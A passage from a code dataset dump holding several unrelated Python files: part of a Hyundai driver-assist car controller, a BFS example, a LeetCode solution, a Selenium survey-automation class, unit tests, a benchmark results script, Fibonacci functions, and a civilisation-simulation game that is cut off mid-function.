and self.mode_change_switch == 0:\n self.mode_change_timer = 50\n self.mode_change_switch = 1\n elif CS.out.cruiseState.modeSel == 2 and self.mode_change_switch == 1:\n self.mode_change_timer = 50\n self.mode_change_switch = 2\n elif CS.out.cruiseState.modeSel == 3 and self.mode_change_switch == 2:\n self.mode_change_timer = 50\n self.mode_change_switch = 3\n elif CS.out.cruiseState.modeSel == 4 and self.mode_change_switch == 3:\n self.mode_change_timer = 50\n self.mode_change_switch = 4\n if self.mode_change_timer > 0:\n self.mode_change_timer -= 1\n\n run_speed_ctrl = self.param_OpkrAccelProfile and CS.acc_active and self.SC != None and (CS.out.cruiseState.modeSel == 1 or CS.out.cruiseState.modeSel == 2 or CS.out.cruiseState.modeSel == 3)\n if not run_speed_ctrl:\n if CS.out.cruiseState.modeSel == 0:\n self.steer_mode = \"오파모드\"\n elif CS.out.cruiseState.modeSel == 1:\n self.steer_mode = \"차간+커브\"\n elif CS.out.cruiseState.modeSel == 2:\n self.steer_mode = \"차간ONLY\"\n elif CS.out.cruiseState.modeSel == 3:\n self.steer_mode = \"자동RES\"\n elif CS.out.cruiseState.modeSel == 4:\n self.steer_mode = \"순정모드\"\n if CS.out.steerWarning == 0:\n self.mdps_status = \"정상\"\n elif CS.out.steerWarning == 1:\n self.mdps_status = \"오류\"\n if CS.lkas_button_on == 0:\n self.lkas_switch = \"OFF\"\n elif CS.lkas_button_on == 1:\n self.lkas_switch = \"ON\"\n else:\n self.lkas_switch = \"-\"\n \n if CS.out.cruiseState.modeSel == 3:\n str_log2 = '주행모드={:s} MDPS상태={:s} LKAS버튼={:s} AUTORES=(VS:{:03.0f}/CN:{:01.0f}/RD:{:03.0f}/BK:{})'.format( self.steer_mode, self.mdps_status, self.lkas_switch, CS.VSetDis, self.res_cnt, self.res_delay, CS.out.brakeLights )\n else:\n str_log2 = '주행모드={:s} MDPS상태={:s} LKAS버튼={:s}'.format( self.steer_mode, self.mdps_status, self.lkas_switch )\n trace1.printf2( '{}'.format( str_log2 ) )\n\n #print( 'st={} cmd={} long={} steer={} req={}'.format(CS.out.cruiseState.standstill, pcm_cancel_cmd, self.CP.openpilotLongitudinalControl, apply_steer, steer_req ) )\n\n\n if pcm_cancel_cmd and self.CP.openpilotLongitudinalControl:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n elif CS.out.cruiseState.standstill and not self.car_fingerprint == CAR.NIRO_EV:\n # run only first time when the car stopped\n if self.last_lead_distance == 0 or not self.param_OpkrAutoResume:\n # get the lead distance from the Radar\n self.last_lead_distance = CS.lead_distance\n self.resume_cnt = 0\n # when lead car starts moving, create 6 RES msgs\n elif CS.lead_distance != self.last_lead_distance and (frame - self.last_resume_frame) > 5:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.resume_cnt += 1\n # interval after 6 msgs\n if self.resume_cnt > 5:\n self.last_resume_frame = frame\n self.resume_cnt = 0\n elif CS.out.cruiseState.standstill and self.car_fingerprint == CAR.NIRO_EV:\n if CS.lead_distance > 3.7 and (frame - self.last_resume_frame)*DT_CTRL > 0.2 and self.param_OpkrAutoResume:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.last_resume_frame = frame\n\n # reset lead distnce after the car starts moving\n elif self.last_lead_distance != 0:\n self.last_lead_distance = 0\n elif run_speed_ctrl and self.SC != None:\n is_sc_run = self.SC.update( CS, sm, self )\n if is_sc_run:\n can_sends.append(create_clu11(self.packer, self.resume_cnt, CS.scc_bus, CS.clu11, self.SC.btn_type, self.SC.sc_clu_speed ))\n self.resume_cnt += 1\n else:\n self.resume_cnt = 0\n \n if CS.out.cruiseState.modeSel == 3:\n if CS.out.brakeLights and CS.VSetDis > 30:\n self.res_cnt = 0\n self.res_delay = 50\n elif self.res_delay:\n self.res_delay -= 1\n elif not self.res_delay and self.res_cnt < 6 and CS.VSetDis > 30 and CS.out.vEgo > 30 * CV.KPH_TO_MS:\n if self.res_cnt < 1:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.res_cnt += 1\n else:\n self.res_cnt = 7\n self.res_delay = 0\n\n # 20 Hz LFA MFA message\n if frame % 5 == 0 and self.car_fingerprint in FEATURES[\"send_lfa_mfa\"]:\n can_sends.append(create_lfa_mfa(self.packer, frame, enabled))\n\n self.lkas11_cnt += 1\n return can_sends\n","sub_path":"selfdrive/car/hyundai/carcontroller.py","file_name":"carcontroller.py","file_ext":"py","file_size_in_byte":14760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140494873","text":"from queue import Queue\r\n\r\n\r\ndef bfs(G, s):\r\n n = len(G)\r\n visited = [False] * n\r\n d = [-1] * n\r\n parent = [None] * n\r\n Q = Queue()\r\n d[s] = 0\r\n visited[s] = True\r\n Q.put(s)\r\n\r\n while not Q.empty():\r\n u = Q.get()\r\n for v in G[u]:\r\n if not visited[v]:\r\n visited[v] = True\r\n d[v] = d[u] + 1\r\n parent[v] = u\r\n Q.put(v)\r\n\r\n return visited, d, parent\r\n\r\n\r\nG = [[1, 2], [0, 4], [0, 3, 5], [2, 4], [1, 3, 5], [2, 4, 6], [5, 7], [6]]\r\nstart = 0\r\nvisited, d, parent = bfs(G, start)\r\nprint(visited, d, parent, sep=\"\\n\")","sub_path":"Ćwiczenia 8/bfs_alist.py","file_name":"bfs_alist.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184143392","text":"'''\nAuthor: Puffrora\nDate: 2022-04-28 17:42:46\nLastModifiedBy: Puffrora\nLastEditTime: 2022-04-29 03:07:43\n'''\n\n\nfrom typing import List\n\nclass Solution:\n def ways(self, pizza: List[str], k: int) -> int:\n \n from functools import lru_cache\n \n R, C = len(pizza), len(pizza[0])\n total = [[0 for _ in range(C+1)] for _ in range(R+1)]\n for i in range(R):\n for j in range(C):\n total[i][j] = int(pizza[i][j]==\"A\")\n for i in range(R-1, -1, -1):\n for j in range(C-1, -1, -1):\n total[i][j] += total[i+1][j]+total[i][j+1]-total[i+1][j+1]\n\n # for the rectangle left-upper point is (i, j), if we want to split it into t parts\n # there are dfs(i, j, t) possible plans in total \n @lru_cache(None)\n def dfs(i, j, t):\n nonlocal R, C\n if total[i][j] < t:\n return 0\n if t == 1:\n return 1\n tmp = 0\n for i1 in range(i+1, R):\n # make sure at least one apple is distributed\n if total[i1][j] < total[i][j]:\n if total[i1][j] < t-1:\n break\n tmp += dfs(i1, j, t-1)\n for j1 in range(j+1, C):\n # make sure at least one apple is distributed\n if total[i][j1] < total[i][j]:\n if total[i][j1] < t-1:\n break\n tmp += dfs(i, j1, t-1)\n return tmp % (10**9 + 7)\n \n return dfs(0, 0, k)\n\n# print(Solution().ways([\"A.AA.A\",\"A..AAA\",\"AA.AA.\",\"..AAA.\"], 5))","sub_path":"Leetcode/leetcode1444 切披萨的方案数.py","file_name":"leetcode1444 切披萨的方案数.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512904315","text":"import os\r\nimport unittest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom features.config.config import settings\r\n\r\n\"\"\"\r\n Author: Muhammad Umair\r\n Date: 12/6/2019\r\n Description:\r\n This file contains all logic implementation of the automation structure\r\n\"\"\"\r\n\r\nclass YunoSurveysUI():\r\n\r\n def __init__(self):\r\n \"\"\"\r\n | This is the constructor of the class\r\n | This will launch the webdriver as set in the settings.json file & maximize the browser window to prepare for the UI automation test.\r\n \"\"\"\r\n if settings['browser'].lower()== \"chrome\":\r\n self.driver = webdriver.Chrome(\"webdrivers/chromedriver\")\r\n elif settings['browser'].lower()== \"ie\":\r\n self.driver = webdriver.Chrome(\"webdrivers/IEDriverServer\")\r\n elif settings['browser'].lower()== \"firefox\":\r\n self.driver = webdriver.Chrome(\"webdrivers/geckodriver\")\r\n self.driver.maximize_window()\r\n\r\n def go_to_survey(self, survey_link):\r\n \"\"\"\r\n Description:\r\n | Method to redirect to the given survey link\r\n :param: survey_link\r\n :type: string\r\n \"\"\"\r\n try:\r\n self.driver.get(str(survey_link))\r\n self.driver.implicitly_wait(30)\r\n \"\"\"\r\n element = WebDriverWait(self.driver, 30).until(EC.presence_of_element_located(By.XPATH(\"//div[@notify-message='question.notify_message']\")))\r\n \"\"\"\r\n except Exception as error:\r\n print('Error loading survey: ' + repr(error))\r\n\r\n def undertaking(self):\r\n \"\"\"\r\n Description:\r\n | Method to verify undertaking before taking survey\r\n \"\"\"\r\n try:\r\n undertaking = self.driver.find_element_by_xpath(\"//label[@for='answer_1_O0010']\")\r\n undertaking.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def click_next_button(self):\r\n \"\"\"\r\n Description:\r\n | Method to click on the \"NEXT\" button present on every page of the survey\r\n \"\"\"\r\n try:\r\n next_btn = self.driver.find_element_by_xpath(\"//button[contains(text(), 'Next')]\")\r\n next_btn.click()\r\n except Exception as error:\r\n print('Error clicking next button: ' + repr(error))\r\n\r\n def select_option(self, option):\r\n \"\"\"\r\n Description:\r\n | Method to select option to answer a survey question\r\n :param: option\r\n :type: string\r\n \"\"\"\r\n select_ans = self.driver.find_elements_by_xpath(\"//label[contains(text(), '\"+str(option)+\"')]\")\r\n select_ans[0].click()\r\n self.click_next_button()\r\n\r\n def write_answer(self, value):\r\n \"\"\"\r\n Description:\r\n | Method to write answer to a survey question\r\n :param: value\r\n :type: string\r\n \"\"\"\r\n self.driver.find_element_by_xpath(\"//input[@name='input']\").send_keys(value)\r\n self.click_next_button()\r\n\r\n def answer_news_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"How many hours per day do you spend on reading the news?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n self.read_survey_question()\r\n news_hrs = self.driver.find_element_by_xpath(\"//label[@for='answer_2_O0010']\")\r\n print(str(news_hrs.get_attribute(\"innerText\")))\r\n news_hrs.click()\r\n\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def social_media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which of these social media platforms do you use at least once a week?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n last_option = self.driver.find_elements_by_xpath(\"//label[@for='answer_3_O0070']\")\r\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n except Exception as error:\r\n print('Error scrolling on page: ' + repr(error))\r\n\r\n try:\r\n insta = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Instagram')]\")\r\n print(str(insta.get_attribute(\"innerText\")))\r\n insta.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n\r\n try:\r\n fb = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Facebook')]\")\r\n print(str(fb.get_attribute(\"innerText\")))\r\n fb.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n\r\n try:\r\n lkdn = self.driver.find_elements_by_xpath(\"//label[contains(text(), 'LinkedIn')]\")\r\n print(str(lkdn[0].get_attribute(\"innerText\")))\r\n lkdn[0].click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which of the following media do you use at least once a week?\"\r\n \"\"\"\r\n try:\r\n tv = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Television')]\")\r\n print(str(tv.get_attribute(\"innerText\")))\r\n tv.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def secrets_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"If given the chance to learn all the secrets of one PROMINENT PERSON, whose secrets would you like to know?\"\r\n \"\"\"\r\n try:\r\n secrets = self.driver.find_element_by_xpath(\"//input[@name='input']\")\r\n secrets.send_keys(\"none\")\r\n print(\"none\")\r\n except Exception as error:\r\n print('Error writing answer: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def trust_media_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Do you agree or disagree: In general, I trust the information I get from the media.\"\r\n \"\"\"\r\n try:\r\n trust_info = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Somewhat agree')]\")\r\n print(str(trust_info.get_attribute(\"innerText\")))\r\n trust_info.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def math_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"What is five plus two?\"\r\n \"\"\"\r\n try:\r\n math_input = self.driver.find_element_by_xpath(\"//input[@name='input']\")\r\n math_input.send_keys(\"7\")\r\n print(\"7\")\r\n except Exception as error:\r\n print('Error writing answer: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def city_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Do you live in a city or in a rural area?\"\r\n \"\"\"\r\n try:\r\n city = self.driver.find_element_by_xpath(\"//label[contains(text(), 'City')]\")\r\n print(str(city.get_attribute(\"innerText\")))\r\n city.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def film_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"Which is your favourite from these award-winning films?\"\r\n \"\"\"\r\n try:\r\n film = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Forrest Gump')]\")\r\n print(str(film.get_attribute(\"innerText\")))\r\n film.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def gandhi_question(self):\r\n \"\"\"\r\n Description:\r\n | Method to automatically select option for question: \"What do you like most about Gandhi?\"\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n except Exception as error:\r\n print('Error scrolling on page: ' + repr(error))\r\n\r\n try:\r\n gandhi_film = self.driver.find_element_by_xpath(\"//label[contains(text(), 'Sound')]\")\r\n print(str(gandhi_film.get_attribute(\"innerText\")))\r\n gandhi_film.click()\r\n except Exception as error:\r\n print('Error clicking option: ' + repr(error))\r\n self.click_next_button()\r\n\r\n def verify_survey_ended(self):\r\n \"\"\"\r\n Description:\r\n | Method to verify that the survey has ended\r\n :return: string\r\n \"\"\"\r\n try:\r\n self.driver.implicitly_wait(10)\r\n end_text = self.driver.find_elements_by_xpath(\"//*[contains(text(), 'All done!')]\")\r\n print(str(end_text[0].get_attribute(\"innerText\")))\r\n except Exception as error:\r\n print('Error finding final text: ' + repr(error))\r\n return str(end_text[0].get_attribute(\"innerText\"))\r\n\r\n def get_answer(self, question):\r\n \"\"\"\r\n Description:\r\n | This method will select a pre-defined answer for each of the given questions in the survey\r\n :param: question\r\n :type: string\r\n \"\"\"\r\n if \"reading\" in question:\r\n self.answer_news_question()\r\n elif \"trust\" in question:\r\n self.trust_media_question()\r\n elif \"social\" in question:\r\n self.social_media_question()\r\n elif \"media\" in question:\r\n self.media_question()\r\n elif \"secrets\" in question:\r\n self.secrets_question()\r\n elif \"five\" in question:\r\n self.math_question()\r\n elif \"city\" in question:\r\n self.city_question()\r\n elif \"award-winning\" in question:\r\n self.film_question()\r\n elif \"like\" in question:\r\n self.gandhi_question()","sub_path":"features/business_logic/yuno_surveys_ui_logic.py","file_name":"yuno_surveys_ui_logic.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453747244","text":"import unittest\nimport sys\nsys.path.append('../')\nfrom tanuki import *\nfrom tanuki.onedim import *\nimport numpy as np\nfrom math import sqrt\nimport copy\n\nclass TestProduct(unittest.TestCase):\n def test_inner(self):\n A = random_opn1DTPS([[\"p0\"],[\"p1\"],[\"p2\"]])\n B = random_opn1DTPS([[\"q0\"],[\"q1\"],[\"q2\"]])\n a = A.to_tensor()\n b = B.to_tensor()\n C = inner_product_fin1DSimTPS_fin1DSimTPS(A,B)\n c = a.conj()[[\"p0\",\"p1\",\"p2\"]] * b[\"q0\",\"q1\",\"q2\"]\n self.assertEqual(C,c)\n\n def test_abs_sub(self):\n phys_labelss = [[\"p0\"],[\"p1\"],[\"p2\"]]\n A = random_opn1DTPS(phys_labelss)\n B = random_opn1DTPS(phys_labelss)\n C = abs_sub_fin1DSimTPS_fin1DSimTPS(A,B)\n a = A.to_tensor()\n b = B.to_tensor()\n c = (a - b).norm()\n self.assertAlmostEqual(C,c)\n\n\n\n\n\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"utests/test_onedim_product.py","file_name":"test_onedim_product.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"588891517","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport pandas as pd\nimport pathlib\nimport os\n\n\ndef dir_path(string):\n if os.path.isdir(string):\n return string\n else:\n raise NotADirectoryError(string)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"src_path\", type=dir_path)\n parser.add_argument(\"out_file\")\n parser.add_argument(\"--raw\", dest=\"raw\", action=\"store_true\")\n args = parser.parse_args()\n\n # collect data from all runs\n data_frames = []\n for path in pathlib.Path(args.src_path).rglob(\"results.csv\"):\n data_frames.append(pd.read_csv(path.as_posix()))\n\n # determine min, max and median\n if not args.raw:\n reduced_data_frames = []\n for df in data_frames:\n reduced_df = df.drop(columns=[\"time_ms\", \"iteration\"]).drop_duplicates()\n reduced_df[\"min_time_ms\"] = df[\"time_ms\"].min()\n reduced_df[\"max_time_ms\"] = df[\"time_ms\"].max()\n reduced_df[\"median_time_ms\"] = df[\"time_ms\"].median()\n reduced_df[\"mean_time_ms\"] = df[\"time_ms\"].mean()\n reduced_data_frames.append(reduced_df)\n data_frames = reduced_data_frames\n\n # concatenate the data\n concat = pd.concat(data_frames, ignore_index=True)\n\n # write the concatenated results\n concat.to_csv(args.out_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmark/runner/collect_results.py","file_name":"collect_results.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"341124926","text":"# Recursive Solution\ndef fib_rec(n):\n\tif n == 0 or n == 1:\n\t\treturn n\n\telse:\n\t\treturn fib_rec(n-1) + fib_rec(n-2)\n\n\n# Instantiate Cache information for Dynamic Programming Solution\nn = 10\ncache = [None] * (n + 1)\ndef fib_dyn(n):\n\tif n == 0 or n == 1:\n\t\treturn n\n\tif cache[n] != None:\n\t\treturn cache[n]\n\tcache[n] = fib_dyn(n-1) + fib_dyn(n-2)\n\treturn cache[n]\n\n\n# Iterative Solution\ndef fib_iter(n):\n\ta, b = 0, 1 \n\twhile n > 0:\n\t\ta, b = b, a+b\n\t\tn -= 1\n\treturn a\n\n\n\"\"\"\nUNCOMMENT THE CODE AT THE BOTTOM OF THIS CELL TO SELECT WHICH SOLUTIONS TO TEST.\nTHEN RUN THE CELL.\n\"\"\"\n\nfrom nose.tools import assert_equal\n\nclass TestFib(object):\n \n def test(self,solution):\n assert_equal(solution(10),55)\n assert_equal(solution(1),1)\n assert_equal(solution(23),28657)\n print('Passed all tests.')\n# UNCOMMENT FOR CORRESPONDING FUNCTION\nt = TestFib()\n\n#t.test(fib_rec)\nt.test(fib_dyn) # Note, will need to reset cache size for each test!\n#t.test(fib_iter)","sub_path":"Udemy Python Algorithms Course/Recursion/Fibonacci_Sequence.py","file_name":"Fibonacci_Sequence.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125455061","text":"###############################################################################\n# ಠ_ಠ CIV ಠ_ಠ #\n###############################################################################\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom random import *\nfrom tkinter import *\nimport math\nfrom PIL import Image, ImageTk\nimport tkinter.messagebox\n#import time\n\n\n# on a map, unit digit gives you the type of field and the other remaining\n# digits give you the civilisation that control the land(if there's no other\n# digit then the field is free).\n\n# legend of the map:\nlegend = {4: \"dry\", 2: \"basic\", 1: \"fertil\", 6: \"desert\", 5: \"mountains\", 3: \"mine\"}\n# gives the initial population on a field based on his type:\ndic_population = {1: 12000, 2: 10000, 3: 4000, 4: 6000, 5: 2000, 6: 1000}\n\ndic_ressources = {1: (dic_population[1] * 1.2 / 2000, 0), 2: (dic_population[2] * 1 / 2000, 0), 3: (0, 4),\n 4: (dic_population[4]*0.6/ 2000, 0), 5: (0, 2), 6: (0, 0)}\n\ngturn=1\ngnot_slowed_down=True\n# 1 food = 2000 persons\n#\n\n\n\n###############################################################################\n# ಠ_ಠ IMPORTANT VARIABLES ಠ_ಠ #\n###############################################################################\n\nprint(\"enter the standard productivity\")\nproductivity = float(input()) # between 0 and 1\nprint(\"enter the standard agressivity\")\nagressivity = float(input()) # between 0 and 1\n\nexpansion = 1 # expansion rate\n\nciv_counter = 0 # counts civ\ndic_civ = dict() # civ dict containing all civs things\n\n\n###############################################################################\n# ಠ_ಠ THE MAP ಠ_ಠ #\n###############################################################################\ndef create_map_random():\n '''\n Generates a random map with a certain percentage of each type of biome.\n Returns the generated map.\n '''\n m = np.random.randint(0, 1, (45, 45))\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n rand = random()\n if rand <= 0.1:\n m[i][j] = 6 # generate a desert\n elif rand <= 0.22:\n m[i][j] = 5 # generate a mountain\n elif rand <= 0.33:\n m[i][j] = 3 # generate a mine\n elif rand <= 0.58:\n m[i][j] = 4 # generate an arid field\n elif rand <= 0.85:\n m[i][j] = 2 # generate a basic field\n elif rand <= 1:\n m[i][j] = 1 # generate a fertil field\n return m\n\ndef create_map_basic():\n m = np.random.randint(0, 1, (45, 45))\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n m[i][j]=2\n return m\n\ndef homogeneize(m):\n '''\n Homogeneizes a given map with a certain percentage of each type of biome.(takes every field that is surrounded by the same type of field and makes it match the others).\n Returns the new map.\n '''\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i][j + 1] == m[i - 1][j]:\n m[i][j] = m[i + 1][j]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i][j + 1] == m[i - 1][j] == m[i][j - 1]:\n m[i][j] = m[i][j + 1]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i - 1][j] == m[i][j - 1]:\n m[i][j] = m[i + 1][j]\n elif i + 1 < len(m) and j + 1 < len(m) and m[i + 1][j] == m[i][j + 1] == m[i][j - 1]:\n m[i][j] = m[i + 1][j]\n\n print(m)\n return m\n\n\ndef test_map_generation(m):\n '''\n Prints the presence's percentage of every biome in a given map.\n '''\n count = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if m[i][j] == 1:\n count[1] += 1\n elif m[i][j] == 2:\n count[2] += 1\n\n elif m[i][j] == 3:\n count[3] += 1\n\n elif m[i][j] == 4:\n count[4] += 1\n\n elif m[i][j] == 5:\n count[5] += 1\n\n elif m[i][j] == 6:\n count[6] += 1\n print(\"fertile:\")\n print(int(100 * (count[1] / (len(m) * len(m)))))\n print(\"basic\")\n print(int(100 * (count[2] / (len(m) * len(m)))))\n print(\"mine\")\n print(int(100 * (count[3] / (len(m) * len(m)))))\n print(\"aride\")\n print(int(100 * (count[4] / (len(m) * len(m)))))\n print(\"mountains\")\n print(int(100 * (count[5] / (len(m) * len(m)))))\n print(\"desert\")\n print(int(100 * (count[6] / (len(m) * len(m)))))\n\n\n###############################################################################\n# ಠ_ಠ THE CIVILISATIONS ಠ_ಠ #\n###############################################################################\n\ndef create_civ(t):\n '''\n given a type of civilisation : expert,warrior or moderate\n Returns a civilisation in the form of a dictionnary giving each of her caracteristics :\n {civname,agressivity,productivity,expansion rate,civ_number,expand_next_iteration,power,population,food,iron,modulo}\n Returns nothing.\n '''\n global civ_counter\n if t == \"expert\":\n new_productivity = 3*productivity\n new_agressivity = agressivity\n expansion_rate = expansion\n power = 1000\n civ_counter += 1\n expand_next_iteration = 0\n food = 3\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 3,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\n elif t == \"warrior\":\n new_productivity = productivity\n new_agressivity = 10 * agressivity\n expansion_rate = 3 * expansion\n power = 1500\n civ_counter += 1\n expand_next_iteration = 0\n food = 1\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 1,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\n elif t == \"moderate\":\n new_productivity = 2 * productivity\n new_agressivity = 3 * agressivity\n expansion_rate = 2 * expansion\n power = 1250\n civ_counter += 1\n expand_next_iteration = 0\n food = 2\n iron = 0\n population = 0\n civ = {\"type\": t, \"aggressivity\": new_agressivity, \"productivity\": new_productivity,\n \"expansion rate\": expansion_rate, \"civ_number\": civ_counter, \"next_expand\": expand_next_iteration,\n \"power\": power, \"population\": population, \"food\": food, \"iron\": iron, \"modulo\": 2,\n \"food_per_turn\": 0, \"iron_per_turn\": 0, \"territories\": 0,\"already_earned\":0,\"already_gave\":0,\"reaction\":0}\n dic_civ[civ_counter] = civ\n\n\ndef spread_population(m, x, y):\n '''\n Adds the population of a field (caracterized by its coordinate (x,y)) to the total population of a civilizations on a given map.\n Returns nothing.\n '''\n global dic_civ\n if m[x][y] > 10:\n # math.floor(m[x][y]/10) extract the civ number from the field,\n # it's the key to enter the caracteristics of the current civilisation so we can extract here total population and add the current population of the field to it.\n dic_civ[math.floor(m[x][y] / 10)][\"population\"] += dic_population[m[x][y] % 10]\n\n\n\ndef spawn_civ(civ, m, x, y):\n '''\n Spawns a given civilisation on the map m on the (x,y) position. Returns the new map.\n Returns the new map.\n '''\n civ_num = civ[\"civ_number\"]\n food, iron = dic_ressources[m[x][y]]\n m[x][y] += civ[\"civ_number\"] * 10 # adds a second digit containing civ number\n spread_population(m,x,y) #initialize the population of the new civ\n dic_civ[civ_num][\"food\"] += food*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron\"] += iron*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"food_per_turn\"] += food*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"iron_per_turn\"] += iron*dic_civ[civ_num][\"productivity\"]\n dic_civ[civ_num][\"territories\"] += 1\n return m\n\n\n\n\n###############################################################################\n# ಠ_ಠ THE DYNAMICS ಠ_ಠ #\n###############################################################################\n\ndef dynamics_civ(civ, m):\n \"\"\"moves a civ on a given map m, depending on many factors :\n if the civ is warrior : 3 fields conquered.\n if the civ is expert : 1 fields conquered.\n if the civ is moderate : 2 fields conquered\n then, depending on the square conquered, civ will have to wait some turns to be able to reconquer a new square:\n if mountain : 50turns\n if desert : 30 turns\n if anything else : 10 turns\n Returns the new map after on turn.\n \"\"\"\n global dic_civ\n new_m = m\n next_turn = 1 # depends on expansion rate, allowing multiple moves\n skip = True # same\n\n dic_civ[civ[\"civ_number\"]][\"food\"] += dic_civ[civ[\"civ_number\"]][\"food_per_turn\"] # adds field food to civ food_per_turn\n dic_civ[civ[\"civ_number\"]][\"iron\"] += dic_civ[civ[\"civ_number\"]][\"iron_per_turn\"] # adds field iron to civ iron_per_turn\n\n if dic_civ[civ[\"civ_number\"]][\"next_expand\"] > 0: # this comparison is to check that the civ is allowed to move again.\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] -= 1\n #for i in range(len(new_m)):\n #for j in range(len(new_m[i])):\n #trading_interaction(civ,new_m,i,j)\n else: # here we allow the civ to expand\n while next_turn > 0:\n new_pos_x = \"fix\" # to fix a bug(civ2 having no place to move then no value for new_pos)\n new_pos_y = \"fix\" # same\n k = 0 # index for first new place for comparison purpose\n for i in range(len(new_m)): # going through all the map\n for j in range(len(new_m[i])):\n x, y = check_surroundings(new_m, i, j) # getting m[i][j] best surroundings pos.\n if new_m[i][j] >= civ[\"civ_number\"] * 10 and new_m[i][j] <= 9 + civ[\"civ_number\"] * 10: # checks if the square is occupied by civ, and that the best surroundings aren't occupied.\n if (not dic_civ[civ[\"civ_number\"]][\"already_gave\"]) and (not 